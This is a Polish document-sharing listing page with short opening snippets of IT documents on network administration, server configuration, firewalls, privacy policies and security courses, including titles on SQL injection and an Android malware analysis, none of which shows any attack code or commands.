Poziomy wymagań Konieczny K Podstawowy- P Rozszerzający- R Dopełniający- D Uczeń: - zna rodzaje sieci - zna topologie sieciowe sieci WYMAGANIA EDUKACYJNE PRZEDMIOT: Administracja sieciowymi systemami operacyjnymi NUMER PROGRAMU NAUCZANIA (ZAKRES): 351203 1. Lp Dział programu Sieci komputerowe Poziomy wymagań Konieczny K Podstawowy-

Bardziej szczegółowo

INSTRUKCJA OBSŁUGI DLA SIECI

INSTRUKCJA OBSŁUGI DLA SIECI INSTRUKCJA OBSŁUGI DLA SIECI Zapisywanie dziennika druku w lokalizacji sieciowej Wersja 0 POL Definicje dotyczące oznaczeń w tekście W tym Podręczniku użytkownika zastosowano następujące ikony: Uwagi informują

Bardziej szczegółowo

Bezpieczeństwo danych w sieciach elektroenergetycznych

Bezpieczeństwo danych w sieciach elektroenergetycznych Bezpieczeństwo danych w sieciach elektroenergetycznych monitorowanie bezpieczeństwa Janusz Żmudziński Polskie Towarzystwo Informatyczne Nadużycia związane z bezpieczeństwem systemów teleinformatycznych

Bardziej szczegółowo

MONITOROWANIE WINDOWS Z NETCRUNCHEM 7 P A G E 1

MONITOROWANIE WINDOWS Z NETCRUNCHEM 7 P A G E 1 MONITOROWANIE WINDOWS Z NETCRUNCHEM 7 P A G E 1 NetCrunch 7 monitoruje systemy MS Windows bez instalowania dodatkowych agentów. Jednakże, ze względu na zaostrzone zasady bezpieczeństwa, zdalne monitorowanie

Bardziej szczegółowo

Spis treści. Dzień 1. I Wprowadzenie (wersja 0906) II Dostęp do danych bieżących specyfikacja OPC Data Access (wersja 0906) Kurs OPC S7

Spis treści. Dzień 1. I Wprowadzenie (wersja 0906) II Dostęp do danych bieżących specyfikacja OPC Data Access (wersja 0906) Kurs OPC S7 I Wprowadzenie (wersja 0906) Kurs OPC S7 Spis treści Dzień 1 I-3 O czym będziemy mówić? I-4 Typowe sytuacje I-5 Klasyczne podejście do komunikacji z urządzeniami automatyki I-6 Cechy podejścia dedykowanego

Bardziej szczegółowo

Zadanie 1 Treść zadania:

Zadanie 1 Treść zadania: Zadanie 1 Treść zadania: 1 2 Komentarz do zadania: Ocenie podlegały następujące elementy projektu: 1. Tytuł pracy egzaminacyjnej. 2. Założenia do projektu. 3. Lista prawdopodobnych przyczyn usterki systemu

Bardziej szczegółowo

Projektowanie bezpieczeństwa sieci i serwerów

Projektowanie bezpieczeństwa sieci i serwerów Projektowanie bezpieczeństwa sieci i serwerów Konfiguracja zabezpieczeń stacji roboczej 1. Strefy bezpieczeństwa przeglądarki Internet Explorer. W programie Internet Explorer można skonfigurować ustawienia

Bardziej szczegółowo

Problemy techniczne SQL Server

Problemy techniczne SQL Server Problemy techniczne SQL Server Co zrobić, jeśli program Optivum nie łączy się poprzez sieć lokalną z serwerem SQL? Programy Optivum, które korzystają z bazy danych umieszczonej na serwerze SQL, mogą być

Bardziej szczegółowo

Administrowanie sieciowymi systemami operacyjnymi

Administrowanie sieciowymi systemami operacyjnymi REFORMA 2012 Administrowanie sieciowymi systemami operacyjnymi Krzysztof Pytel, Sylwia Osetek Kwalifikacja E.13.3 Podręcznik do nauki zawodu TECHNIK INFORMATYK TECHNIK TELEINFORMATYK Podręcznik dopuszczony

Bardziej szczegółowo

2014 Electronics For Imaging. Informacje zawarte w niniejszej publikacji podlegają postanowieniom opisanym w dokumencie Uwagi prawne dotyczącym tego

2014 Electronics For Imaging. Informacje zawarte w niniejszej publikacji podlegają postanowieniom opisanym w dokumencie Uwagi prawne dotyczącym tego 2014 Electronics For Imaging. Informacje zawarte w niniejszej publikacji podlegają postanowieniom opisanym w dokumencie Uwagi prawne dotyczącym tego produktu. 23 czerwca 2014 Spis treści 3 Spis treści...5

Bardziej szczegółowo

Windows Serwer 2008 R2. Moduł 5. Zarządzanie plikami

Windows Serwer 2008 R2. Moduł 5. Zarządzanie plikami Windows Serwer 2008 R2 Moduł 5. Zarządzanie plikami Sprawdzamy konfigurację kart sieciowych 172.16.x.0 x nr w dzienniku Na serwerze musi działać Internet! Statyczny adres IP jest potrzebny komputerom,

Bardziej szczegółowo

Podstawy Informatyki. Wykład 4 Komendy UNIXa, cd

Podstawy Informatyki. Wykład 4 Komendy UNIXa, cd Podstawy Informatyki Wykład 4 Komendy UNIXa, cd Komendy UNIXa, cd: ls - listowanie zawartości katalogu (listing), 48%{sendzimir}/home/sysadm/wilk/dydaktyka/c>ls kar* karman* karman.cpp karman.out press.dat

Bardziej szczegółowo

Przewodnik technologii ActivCard

Przewodnik technologii ActivCard PROFESJONALNE USŁUGI BEZPIECZEŃSTWA Przewodnik technologii ActivCard Część II. Polityka bezpieczeństwa systemu ActivPack CLICO Centrum Oprogramowania Sp. z o.o., Al. 3-go Maja 7, 30-063 Kraków; Tel: 12

Bardziej szczegółowo

11. Autoryzacja użytkowników

11. Autoryzacja użytkowników 11. Autoryzacja użytkowników Rozwiązanie NETASQ UTM pozwala na wykorzystanie trzech typów baz użytkowników: Zewnętrzna baza zgodna z LDAP OpenLDAP, Novell edirectory; Microsoft Active Direcotry; Wewnętrzna

Bardziej szczegółowo

Wykaz zmian w programie SysLoger

Wykaz zmian w programie SysLoger Wykaz zmian w programie SysLoger Pierwsza wersja programu 1.0.0.1 powstała we wrześniu 2011. Funkcjonalność pierwszej wersji programu: 1. Zapis logów do pliku tekstowego, 2. Powiadamianie e-mail tylko

Bardziej szczegółowo

Najczęściej występujące problemy z instalacją i konfiguracją i ich rozwiązania.

Najczęściej występujące problemy z instalacją i konfiguracją i ich rozwiązania. Najczęściej występujące problemy z instalacją i konfiguracją i ich rozwiązania. Q. Jak uruchomić instalator? A. Trzeba nadać instalatorowi atrybut 'wykonywalny'. Można to zrobić wydając polecenie `chmod

Bardziej szczegółowo

Spis treści. Rozdział 3. Podstawowe operacje na plikach...49 System plików... 49 Konsola... 49 Zapisanie rezultatu do pliku... 50

Spis treści. Rozdział 3. Podstawowe operacje na plikach...49 System plików... 49 Konsola... 49 Zapisanie rezultatu do pliku... 50 Spis treści Rozdział 1. Instalacja systemu Aurox...5 Wymagania sprzętowe... 5 Rozpoczynamy instalację... 6 Wykrywanie i instalacja urządzeń... 7 Zarządzanie partycjami... 10 Konfiguracja sieci i boot loadera...

Bardziej szczegółowo

Podstawy zabezpieczania serwera. Marcin Bieńkowski

Podstawy zabezpieczania serwera. Marcin Bieńkowski komputerowa Podstawy zabezpieczania serwera Marcin Bieńkowski Instytut Informatyki Uniwersytet Wrocławski komputerowa () Podstawy zabezpieczania serwera 1 / 17 Z oczywistych przyczyn... Pojawia się tu

Bardziej szczegółowo

Szczegółowa specyfikacja funkcjonalności zamawianego oprogramowania.

Szczegółowa specyfikacja funkcjonalności zamawianego oprogramowania. Szczegółowa specyfikacja funkcjonalności zamawianego oprogramowania. Założenia projektowe systemu NETDOC. część 1: założenia ogólne i funkcjonalność rdzenia systemu Założenia ogólne Celem projektu jest

Bardziej szczegółowo

Poradnik zetula.pl. Jak założyć konto na zetula.pl. i zabezpieczyć dane na swoim komputerze?

Poradnik zetula.pl. Jak założyć konto na zetula.pl. i zabezpieczyć dane na swoim komputerze? Poradnik zetula.pl Jak założyć konto na zetula.pl i zabezpieczyć dane na swoim komputerze? 1.Wejdź na stronę www.zetula.pl 2.Kliknij na odnośniku Utwórz nowe konto 3.Wypełnij formularz rejestracyjny. Pola

Bardziej szczegółowo

Usługi sieciowe systemu Linux

Usługi sieciowe systemu Linux Usługi sieciowe systemu Linux 1. Serwer WWW Najpopularniejszym serwerem WWW jest Apache, dostępny dla wielu platform i rozprowadzany w pakietach httpd. Serwer Apache bardzo często jest wykorzystywany do

Bardziej szczegółowo

4. Podstawowa konfiguracja

4. Podstawowa konfiguracja 4. Podstawowa konfiguracja Po pierwszym zalogowaniu się do urządzenia należy zweryfikować poprawność licencji. Można to zrobić na jednym z widżetów panelu kontrolnego. Wstępną konfigurację można podzielić

Bardziej szczegółowo

Bezpieczeństwo systemów informatycznych

Bezpieczeństwo systemów informatycznych Bezpieczeństwo systemów informatycznych Rule Set Based Access Control ĆWICZENIE RSBAC 1 Wprowadzenie RSBAC to zestaw łat na jądro systemu Linux rozszerzających bezpieczeństwo systemu. Wspiera on mechanizmy

Bardziej szczegółowo

Test. Administrowanie sieciowymi systemami operacyjnymi

Test. Administrowanie sieciowymi systemami operacyjnymi Test Administrowanie sieciowymi systemami operacyjnymi 1) Która warstwa modelu ISO/OSI jest związana z protokołem IP? A. Sieciowa. B. Fizyczna. C. Transportowa. D. Łącza danych. 2) W sieciach lokalnych,

Bardziej szczegółowo

SQL injection. Metody włamań do systemów komputerowych p. 1/13. Bogusław Kluge, Karina Łuksza, Ewa Makosa

SQL injection. Metody włamań do systemów komputerowych p. 1/13. Bogusław Kluge, Karina Łuksza, Ewa Makosa Metody włamań do systemów komputerowych SQL injection Bogusław Kluge, Karina Łuksza, Ewa Makosa b.kluge@zodiac.mimuw.edu.pl, k.luksza@zodiac.mimuw.edu.pl, e.makosa@zodiac.mimuw.edu.pl Metody włamań do

Bardziej szczegółowo

ABA-X3 PXES v. 1.5.0 Podręczna instrukcja administratora. FUNKCJE SIECIOWE Licencja FDL (bez prawa wprowadzania zmian)

ABA-X3 PXES v. 1.5.0 Podręczna instrukcja administratora. FUNKCJE SIECIOWE Licencja FDL (bez prawa wprowadzania zmian) Grupa Ustawienia Sieciowe umożliwia skonfigurowanie podstawowych parametrów terminala: Interfejs ETH0 Umożliwia wybór ustawień podstawowego interfejsu sieciowego. W przypadku wyboru DHCP adres oraz inne

Bardziej szczegółowo

Wymagania techniczne infrastruktury IT potrzebne do uruchomienia i pracy ServiceDesk Plus

Wymagania techniczne infrastruktury IT potrzebne do uruchomienia i pracy ServiceDesk Plus Wymagania techniczne infrastruktury IT potrzebne do uruchomienia i pracy ServiceDesk Plus Status: Tajemnica handlowa Wersja z dnia: 23 października 2013 Strona: 1 z 8 SPIS TREŚCI 1. Wymagania dla serwera

Bardziej szczegółowo

P O L I T Y K A P R Y W A T N O Ś C I. 1 Jak zbieramy dane?

P O L I T Y K A P R Y W A T N O Ś C I. 1 Jak zbieramy dane? P O L I T Y K A P R Y W A T N O Ś C I 1. Niniejsza Polityka Prywatności określa zasady gromadzenia, przetwarzania i wykorzystywania danych osobowych pozyskanych przez Sklep Internetowy www.yourboard.pl

Bardziej szczegółowo

Praca w sieci z serwerem

Praca w sieci z serwerem 11 Praca w sieci z serwerem Systemy Windows zostały zaprojektowane do pracy zarówno w sieci równoprawnej, jak i w sieci z serwerem. Sieć klient-serwer oznacza podłączenie pojedynczego użytkownika z pojedynczej

Bardziej szczegółowo

Pracownia internetowa w każdej szkole (edycja jesień 2005)

Pracownia internetowa w każdej szkole (edycja jesień 2005) Instrukcja numer SPD1/04_03/Z2 Pracownia internetowa w każdej szkole (edycja jesień 2005) Opiekun pracowni internetowej cz. 1 (PD1) Przygotowanie własnego obrazu systemu operacyjnego dla stacji roboczych

Bardziej szczegółowo

System kontroli dostępu ACCO NET Instrukcja instalacji

System kontroli dostępu ACCO NET Instrukcja instalacji System kontroli dostępu ACCO NET Instrukcja instalacji acco_net_i_pl 12/14 SATEL sp. z o.o. ul. Budowlanych 66 80-298 Gdańsk POLSKA tel. 58 320 94 00 serwis 58 320 94 30 dz. techn. 58 320 94 20; 604 166

Bardziej szczegółowo

Asix. Konfiguracja serwera MS SQL dla potrzeb systemu Asix. Pomoc techniczna NIEZAWODNE ROZWIĄZANIA SYSTEMÓW AUTOMATYKI

Asix. Konfiguracja serwera MS SQL dla potrzeb systemu Asix. Pomoc techniczna NIEZAWODNE ROZWIĄZANIA SYSTEMÓW AUTOMATYKI NIEZAWODNE ROZWIĄZANIA SYSTEMÓW AUTOMATYKI Asix Konfiguracja serwera MS SQL dla potrzeb systemu Asix Pomoc techniczna Dok. Nr PLP0024 Wersja:2015-03-04 ASKOM i Asix to zastrzeżony znak firmy ASKOM Sp.

Bardziej szczegółowo

POLITYKA PRYWATNOŚCI Konkurs wiedzy dermatologicznej dla lekarzy

POLITYKA PRYWATNOŚCI Konkurs wiedzy dermatologicznej dla lekarzy POLITYKA PRYWATNOŚCI Konkurs wiedzy dermatologicznej dla lekarzy Organizowanego przez HealthThink public relations Niniejsza Polityka Prywatności określa zasady przechowywania i dostępu do informacji na

Bardziej szczegółowo

BEZPIECZEŃSTWO W SIECIACH

BEZPIECZEŃSTWO W SIECIACH PREZENTACJA NA SYSTEMY OPERACYJNE Katarzyna Macioszek styczeń 2007 DEFINICJA ROBAKA CO TO JEST ROBAK? PRZYKŁADY ROBAKÓW Robak - program komputerowy zdolny do samoreplikacji przez sieć bez interakcji użytkownika

Bardziej szczegółowo

ZASADY KORZYSTANIA Z PLIKÓW COOKIES ORAZ POLITYKA PRYWATNOŚCI W SERWISIE INTERNETOWYM PawłowskiSPORT.pl

ZASADY KORZYSTANIA Z PLIKÓW COOKIES ORAZ POLITYKA PRYWATNOŚCI W SERWISIE INTERNETOWYM PawłowskiSPORT.pl ZASADY KORZYSTANIA Z PLIKÓW COOKIES ORAZ POLITYKA PRYWATNOŚCI W SERWISIE INTERNETOWYM PawłowskiSPORT.pl Niniejsze zasady dotyczą wszystkich Użytkowników strony internetowej funkcjonującej w domenie http://www.pawlowskisport.pl,

Bardziej szczegółowo

Instalacja systemów operacyjnych i tworzenie domeny

Instalacja systemów operacyjnych i tworzenie domeny Przygotowanie VMWARE SERVER do pracy Zainstaluj VMWARE SERVER Zainstaluj VMWARE TOOLS (potrzebne połączenie z Internetem) Instalacja systemów operacyjnych i tworzenie domeny Zainstaluj Microsoft Windows

Bardziej szczegółowo

Client-side Hacking - wprowadzenie w tematykę ataków na klienta. Radosław Wal radoslaw.wal@clico.pl

Client-side Hacking - wprowadzenie w tematykę ataków na klienta. Radosław Wal radoslaw.wal@clico.pl Client-side Hacking - wprowadzenie w tematykę ataków na klienta Radosław Wal radoslaw.wal@clico.pl Plan wystąpienia Wprowadzenie Statystyki incydentów bezpieczeństwa Typowe zagrożenia Client-side Minimalne

Bardziej szczegółowo

SYLABUS/KARTA PRZEDMIOTU

SYLABUS/KARTA PRZEDMIOTU PAŃSTWOWA WYŻSZA SZKOŁA ZAWODOWA W GŁOGOWIE SYLABUS/KARTA PRZEDMIOTU. NAZWA PRZEDMIOTU Inżynieria Bezpieczeństwa. NAZWA JEDNOSTKI PROWADZĄCEJ PRZEDMIOT Instytut Politechniczny 3. STUDIA kierunek stopień

Bardziej szczegółowo

PROCEDURY BEZPIECZNEJ EKSPLOATACJI NAZWA SYSTEMU WERSJA.(NUMER WERSJI DOKUMENTU, NP. 1.0)

PROCEDURY BEZPIECZNEJ EKSPLOATACJI NAZWA SYSTEMU WERSJA.(NUMER WERSJI DOKUMENTU, NP. 1.0) pełna nazwa jednostki organizacyjnej ZATWIERDZAM... PROCEDURY BEZPIECZNEJ EKSPLOATACJI DLA SYSTEMU TELEINFORMATYCZNEGO NAZWA SYSTEMU WERSJA.(NUMER WERSJI DOKUMENTU, NP. 1.0) Pełnomocnik Ochrony Kierownik

Bardziej szczegółowo

Procedura wdrożeniowa program MERKURY QUATTRO wer. 1.0

Procedura wdrożeniowa program MERKURY QUATTRO wer. 1.0 Syriusz sp. z o.o. Rzeszów, 2009 Procedura wdrożeniowa program MERKURY QUATTRO wer. 1.0 POSTANOWIENIA OGÓLNE Minimalna, sugerowana ilość godzin wdrożenia programu to: bez przenoszenia danych 8 godzin +

Bardziej szczegółowo

- dyrektor firmy wezwał serwis w celu zdiagnozowania i usunięcia usterek gdyż zauważono nieprawidłowości w działaniu systemu komputerowego,

- dyrektor firmy wezwał serwis w celu zdiagnozowania i usunięcia usterek gdyż zauważono nieprawidłowości w działaniu systemu komputerowego, 1. Projekt realizacji prac prowadzących do zlokalizowania i usunięcia usterek systemu komputerowego w zakresie diagnozowania wstępnego, ustalenia przyczyn usterek i usunięcia usterek.. 2. Założenia do

Bardziej szczegółowo

Certyfikat. 1 Jak zbieramy dane?

Certyfikat. 1 Jak zbieramy dane? Certyfikat P O L I T Y K A P R Y W A T N O Ś C I 1. Niniejsza Polityka Prywatności określa zasady gromadzenia, przetwarzania i wykorzystywania danych osobowych pozyskanych przez serwis internetowy miejscereklam.pl

Bardziej szczegółowo

Wykaz zmian w programie Win Admin Replikator

Wykaz zmian w programie Win Admin Replikator Wykaz zmian w programie Win Admin Replikator Pierwsza wersja programu 1.0.0.0 powstała w czerwcu 2010. kod źródłowy programu zawiera ponad 6 900 wierszy. Modyfikacje/zmiany w wersji 1.0.4.0 (październik

Bardziej szczegółowo

Płace Optivum. 1. Zainstalować serwer SQL (Microsoft SQL Server 2008 R2) oraz program Płace Optivum.

Płace Optivum. 1. Zainstalować serwer SQL (Microsoft SQL Server 2008 R2) oraz program Płace Optivum. Płace Optivum Jak przenieść dane programu Płace Optivum na nowy komputer? Aby kontynuować pracę z programem Płace Optivum na nowym komputerze, należy na starym komputerze wykonać kopię zapasową bazy danych

Bardziej szczegółowo

Wykład 3 Inżynieria oprogramowania. Przykład 1 Bezpieczeństwo(2) wg The Java EE 5 Tutorial Autor: Zofia Kruczkiewicz

Wykład 3 Inżynieria oprogramowania. Przykład 1 Bezpieczeństwo(2) wg The Java EE 5 Tutorial Autor: Zofia Kruczkiewicz Wykład 3 Inżynieria oprogramowania Przykład 1 Bezpieczeństwo(2) wg The Java EE 5 Tutorial Autor: Zofia Kruczkiewicz Struktura wykładu 1. Utworzenie użytkowników i ról na serwerze aplikacji Sun Java System

Bardziej szczegółowo

Pracownia internetowa w każdej szkole (edycja Jesień 2007)

Pracownia internetowa w każdej szkole (edycja Jesień 2007) Instrukcja numer D1/05_03/Z Pracownia internetowa w każdej szkole (edycja Jesień 2007) Opiekun pracowni internetowej cz. 1 Ręczne zakładanie kont użytkowników (D1) Jak ręcznie założyć konto w systemie

Bardziej szczegółowo

Skanowanie podsieci oraz wykrywanie terminali ABA-X3

Skanowanie podsieci oraz wykrywanie terminali ABA-X3 Skanowanie podsieci oraz wykrywanie terminali ABA-X3 Terminale ABA-X3 od dostarczane od połowy listopada 2010 r. są wyposażane w oprogramowanie umożliwiające skanowanie podsieci w poszukiwaniu aktywnych

Bardziej szczegółowo

Firewalle, maskarady, proxy

Firewalle, maskarady, proxy Firewalle, maskarady, proxy Patryk Czarnik Wydział Matematyki, Informatyki i Mechaniki Uniwersytet Warszawski Bezpieczeństwo sieci komputerowych MSUI 2009/10 Patryk Czarnik (MIMUW) 08 Firewall BSK 2009/10

Bardziej szczegółowo

Audyt zasobów sprzętowych i systemowych (za pomocą dostępnych apletów Windows oraz narzędzi specjalnych)

Audyt zasobów sprzętowych i systemowych (za pomocą dostępnych apletów Windows oraz narzędzi specjalnych) Audyt zasobów sprzętowych i systemowych (za pomocą dostępnych apletów Windows oraz narzędzi specjalnych) SYSTEM OPERACYJNY I JEGO OTOCZENIE System operacyjny/wersja, uaktualnienia, klucz produktu Stan

Bardziej szczegółowo

Wykład 3 / Wykład 4. Na podstawie CCNA Exploration Moduł 3 streszczenie Dr inż. Robert Banasiak

Wykład 3 / Wykład 4. Na podstawie CCNA Exploration Moduł 3 streszczenie Dr inż. Robert Banasiak Wykład 3 / Wykład 4 Na podstawie CCNA Exploration Moduł 3 streszczenie Dr inż. Robert Banasiak 1 Wprowadzenie do Modułu 3 CCNA-E Funkcje trzech wyższych warstw modelu OSI W jaki sposób ludzie wykorzystują

Bardziej szczegółowo

Pomoc dla http://host.nask.pl/ 31.12.2012 r.

Pomoc dla http://host.nask.pl/ 31.12.2012 r. Pomoc dla http://host.nask.pl/ 31.12.2012 r. Spis treści Kontakt... 2 Logowanie do konta pocztowego przez WWW... 3 Logowanie do panelu administracyjnego... 4 Konfiguracja klienta pocztowego... 7 Umieszczanie

Bardziej szczegółowo

Kadry Optivum, Płace Optivum. Jak przenieść dane na nowy komputer?

Kadry Optivum, Płace Optivum. Jak przenieść dane na nowy komputer? Kadry Optivum, Płace Optivum Jak przenieść dane na nowy komputer? Aby kontynuować pracę z programem Kadry Optivum lub Płace Optivum (lub z obydwoma programami pracującymi na wspólnej bazie danych) na nowym

Bardziej szczegółowo

Modele uwierzytelniania, autoryzacji i kontroli dostępu do systemów komputerowych.

Modele uwierzytelniania, autoryzacji i kontroli dostępu do systemów komputerowych. Modele uwierzytelniania, autoryzacji i kontroli dostępu do systemów komputerowych. Uwierzytelnianie, autoryzacja i kontrola dostępu Funkcjonowanie internetu w dużej mierze opiera się na zaufaniu i kontroli

Bardziej szczegółowo

Złośliwe oprogramowanie Sandrorat (podszywające się pod oprogramowanie Kaspersky) na platformę Android WYNIKI ANALIZY

Złośliwe oprogramowanie Sandrorat (podszywające się pod oprogramowanie Kaspersky) na platformę Android WYNIKI ANALIZY Złośliwe oprogramowanie Sandrorat (podszywające się pod oprogramowanie Kaspersky) na platformę Android WYNIKI ANALIZY 4 sierpnia 2014 r. W dniach 1 do 4 sierpnia 2014 r. poddaliśmy analizie oprogramowanie

Bardziej szczegółowo

PROJEKTOWANIE BEZPIECZEŃSTWA STRATEGIE KONSERWACYJNE, PRAKTYKI ADMINISTRACYJNE

PROJEKTOWANIE BEZPIECZEŃSTWA STRATEGIE KONSERWACYJNE, PRAKTYKI ADMINISTRACYJNE Wykład 6 1 PROJEKTOWANIE BEZPIECZEŃSTWA STRATEGIE KONSERWACYJNE, PRAKTYKI ADMINISTRACYJNE 2 Strategie konserwacyjne i praktyki administracyjne Ulepszanie systemów i operacji + zapewnianie ochrony danych

Bardziej szczegółowo

System operacyjny Linux

System operacyjny Linux Paweł Rajba pawel.rajba@continet.pl http://kursy24.eu/ Zawartość modułu 2 Instalacja opensuse Przygotowanie do instalacji Konfiguracja instalacji Zakończenie instalacji Instalacja oprogramowania Program

Bardziej szczegółowo

PTV MAP&GUIDE INTERNET V2 ŁATWE PRZESTAWIENIE SIĘ

PTV MAP&GUIDE INTERNET V2 ŁATWE PRZESTAWIENIE SIĘ PTV MAP&GUIDE INTERNET V2 ŁATWE PRZESTAWIENIE SIĘ Spis treści Spis treści 1 PTV Map&Guide internet V2 co jest nowe?... 3 1.1 Zmiana modelu licencji... 3 1.1.1 Starzy klienci 3 1.1.2 Nowi klienci 3 1.2

Bardziej szczegółowo

Wykład 2: Budowanie sieci lokalnych. A. Kisiel, Budowanie sieci lokalnych

Wykład 2: Budowanie sieci lokalnych. A. Kisiel, Budowanie sieci lokalnych Wykład 2: Budowanie sieci lokalnych 1 Budowanie sieci lokalnych Technologie istotne z punktu widzenia konfiguracji i testowania poprawnego działania sieci lokalnej: Protokół ICMP i narzędzia go wykorzystujące

Bardziej szczegółowo

Symantec Backup Exec System Recovery 7.0 Server Edition. Odtwarzanie systemu Windows w ciągu najwyżej kilkudziesięciu minut nie godzin czy dni

Symantec Backup Exec System Recovery 7.0 Server Edition. Odtwarzanie systemu Windows w ciągu najwyżej kilkudziesięciu minut nie godzin czy dni GŁÓWNE ZALETY Odtwarzanie systemu Windows w ciągu najwyżej kilkudziesięciu minut nie godzin czy dni Firma Symantec wielokrotnie publicznie udowadniała, że dzięki oprogramowaniu Backup Exec System Recovery

Bardziej szczegółowo

Temat: EasyAccess 2.0 Data: 10 Października 2014 Prowadzący: Maciej Sakowicz

Temat: EasyAccess 2.0 Data: 10 Października 2014 Prowadzący: Maciej Sakowicz Temat: EasyAccess 2.0 Data: 10 Października 2014 Prowadzący: Maciej Sakowicz Agenda Część 1: Studium przypadku i rozwiązanie Część 2: Czym jest EasyAccess 2.0? Część 3: Dlaczego warto użyć EasyAccess 2.0?

Bardziej szczegółowo

Jednolite zarządzanie użytkownikami systemów Windows i Linux

Jednolite zarządzanie użytkownikami systemów Windows i Linux Uniwersytet Mikołaja Kopernika Wydział Matematyki i Informatyki Wydział Fizyki, Astronomii i Informatyki Stosowanej Paweł Gliwiński Nr albumu: 168470 Praca magisterska na kierunku Informatyka Jednolite

Bardziej szczegółowo

Bezpieczne strony WWW dla edukacji, organizacji non-profit i uŝytkowników indywidualnych.

Bezpieczne strony WWW dla edukacji, organizacji non-profit i uŝytkowników indywidualnych. Bezpieczne strony WWW dla edukacji, organizacji non-profit i uŝytkowników indywidualnych. Jerzy Mikołajczak, Sebastian Petruczynik, Marek Zawadzki support-mic@man.poznan.pl 1 Plan prezentacji: 1. Wstęp

Bardziej szczegółowo

INSTRUKCJA ZARZĄDZANIA SYSTEMEM INFORMATYCZNYM SŁUŻĄCYM DO PRZETWARZANIA DANYCH OSOBOWYCH W OŚRODKU KULTURY W DRAWSKU POMORSKIM

INSTRUKCJA ZARZĄDZANIA SYSTEMEM INFORMATYCZNYM SŁUŻĄCYM DO PRZETWARZANIA DANYCH OSOBOWYCH W OŚRODKU KULTURY W DRAWSKU POMORSKIM Załącznik Nr 3 do zarządzenia Nr 5/2012 Dyrektora Ośrodka Kultury w Drawsku Pomorskim z dnia 1 marca 2012 r. INSTRUKCJA ZARZĄDZANIA SYSTEMEM INFORMATYCZNYM SŁUŻĄCYM DO PRZETWARZANIA DANYCH OSOBOWYCH W

Bardziej szczegółowo

Samsung Universal Print Driver Podręcznik użytkownika

Samsung Universal Print Driver Podręcznik użytkownika Samsung Universal Print Driver Podręcznik użytkownika wyobraź sobie możliwości Copyright 2009 Samsung Electronics Co., Ltd. Wszelkie prawa zastrzeżone. Ten podręcznik administratora dostarczono tylko w

Bardziej szczegółowo

POLITYKA PRYWATNOŚCI

POLITYKA PRYWATNOŚCI POLITYKA PRYWATNOŚCI 1. Niniejsza Polityka Prywatności określa zasady przetwarzania danych osobowych pozyskanych za pośrednictwem Sklepu Internetowego www.mybodie.pl (zwanego dalej: Sklepem ). 2. Właścicielem

Bardziej szczegółowo

TECHNIK INFORMATYK. druga diagnoza przed egzaminem zawodowym w ostatniej klasie technikum i szkoły policealnej

TECHNIK INFORMATYK. druga diagnoza przed egzaminem zawodowym w ostatniej klasie technikum i szkoły policealnej TECHNIK INFORMATYK druga diagnoza przed egzaminem zawodowym w ostatniej klasie technikum i szkoły policealnej Informacje dla nauczyciela sprawdzającego prace egzaminacyjne Copyright by Wydawnictwa Szkolne

Bardziej szczegółowo

PROFESJONALNE SYSTEMY BEZPIECZEŃSTWA

PROFESJONALNE SYSTEMY BEZPIECZEŃSTWA PROFESJONALNE SYSTEMY BEZPIECZEŃSTWA Przewodnik konfiguracji i zarządzania Siemens 4YourSafety Konfiguracja Siemens 4YourSafety w zakresie systemu operacyjnego i supportu urządzenia może odbywać się w

Bardziej szczegółowo

Jarosław Kuchta Administrowanie Systemami Komputerowymi. Usługi terminalowe

Jarosław Kuchta Administrowanie Systemami Komputerowymi. Usługi terminalowe Jarosław Kuchta Usługi terminalowe Zagadnienia Wykorzystanie usług terminalowych Sposób działania usług terminalowych Instalowanie usług terminalowych Funkcje usług terminalowych Usługi terminalowe 2 Wykorzystanie

Bardziej szczegółowo

Data wydania: 2013-06-12. Projekt współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Społecznego

Data wydania: 2013-06-12. Projekt współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Społecznego Wersja 1.0 Projekt współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki Tytuł dokumentu: Dokumentacja dla administratora strony

Bardziej szczegółowo

Memeo Instant Backup Podręcznik Szybkiego Startu

Memeo Instant Backup Podręcznik Szybkiego Startu Wprowadzenie Memeo Instant Backup pozwala w łatwy sposób chronić dane przed zagrożeniami cyfrowego świata. Aplikacja regularnie i automatycznie tworzy kopie zapasowe ważnych plików znajdujących się na

Bardziej szczegółowo

Praca w sieci równorzędnej

Praca w sieci równorzędnej Praca w sieci równorzędnej 1. Architektura sieci równorzędnej i klient-serwer Serwer - komputer, który udostępnia zasoby lub usługi. Klient komputer lub urządzenie korzystające z udostępnionych przez serwer

Bardziej szczegółowo

Opis administracji terminali ABA-X3 v.1.5.0

Opis administracji terminali ABA-X3 v.1.5.0 Opis administracji terminali v.1.5.0 System terminalowy jest scentralizowany oznacza to, że Użytkownik stacji roboczej (terminala) jest całkowicie uzależniony od konfiguracji wprowadzonej przez Administratora.

Bardziej szczegółowo

Wyciąg z ogólnej analizy ataków na witryny administracji państwowej RP w okresie 21 25 stycznia 2012r.

Wyciąg z ogólnej analizy ataków na witryny administracji państwowej RP w okresie 21 25 stycznia 2012r. Wyciąg z ogólnej analizy ataków na witryny administracji państwowej RP w okresie 21 25 stycznia 2012r. W dniach 21 25 stycznia 2012 miał miejsce szereg ataków na zasoby instytucji administracji państwowej,

Bardziej szczegółowo

POLITYKA BEZPIECZEŃSTWA PRZETWARZANIA DANYCH OSOBOWYCH ZESPOŁU EKONOMICZNO ADMINISTRACYJNEGO SZKÓŁ I PRZEDSZKOLA W GRĘBOCICACH

POLITYKA BEZPIECZEŃSTWA PRZETWARZANIA DANYCH OSOBOWYCH ZESPOŁU EKONOMICZNO ADMINISTRACYJNEGO SZKÓŁ I PRZEDSZKOLA W GRĘBOCICACH Załącznik Nr 1 Do ZARZĄDZANIA NR 9/2011 POLITYKA BEZPIECZEŃSTWA ZESPOŁU EKONOMICZNO ADMINISTRACYJNEGO SZKÓŁ I PRZEDSZKOLA W GRĘBOCICACH Podstawa prawna: - rozporządzenie Ministra Spraw Wewnętrznych i Administracji

Bardziej szczegółowo

Firewalle, maskarady, proxy

Firewalle, maskarady, proxy Firewalle, maskarady, proxy Patryk Czarnik Bezpieczeństwo sieci komputerowych MSUI 2010/11 Kontrola dostępu Polityka kontroli dostępu określa sposób dostępu do poszczególnych zasobów organizacji. Może

Bardziej szczegółowo

Sieciowa instalacja Sekafi 3 SQL

